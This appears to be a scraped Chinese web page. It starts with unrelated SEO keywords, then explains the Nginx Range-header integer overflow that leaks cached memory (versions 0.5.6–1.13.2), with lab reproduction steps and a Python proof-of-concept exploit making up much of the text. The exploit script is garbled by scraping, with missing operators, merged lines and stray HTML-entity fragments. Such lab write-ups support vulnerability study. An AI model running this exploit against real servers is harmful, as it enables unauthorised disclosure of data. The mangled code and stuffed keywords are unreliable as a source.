北京 网站建设 公司,广东住房城乡建设厅网站,电商设计师简历,网站开发的开题报告引言漏洞原理#xff1a;
影响版本内默认配置模块的Nginx只需要开启缓存#xff0c;攻击者可以通过发送包含恶意构造range域的header请求进行远程攻击造成信息泄露。
影响范围#xff1a; Nginx 0.5.6 – 1.13.2
漏洞复现#xff1a; 开启靶场#xff0c;访问8080端口 中间…漏洞原理
影响版本内默认配置模块的Nginx只需要开启缓存攻击者可以通过发送包含恶意构造range域的header请求进行远程攻击造成信息泄露。
影响范围 Nginx 0.5.6 – 1.13.2
漏洞复现 开启靶场访问8080端口 中间件版本在影响范围内
使用poc验证漏洞
#!/usr/bin/env python
import sys
import requestsif len(sys.argv) 2:print(%s url % (sys.argv[0]))print(eg: python %s http://your-ip:8080/ % (sys.argv[0]))sys.exit()headers {User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240
}
offset 605
url sys.argv[1]
file_len len(requests.get(url, headersheaders).content)
n file_len offset
headers[Range] bytes-%d,-%d % (n, 0x8000000000000000 - n)r requests.get(url, headersheaders)
print(r.text)
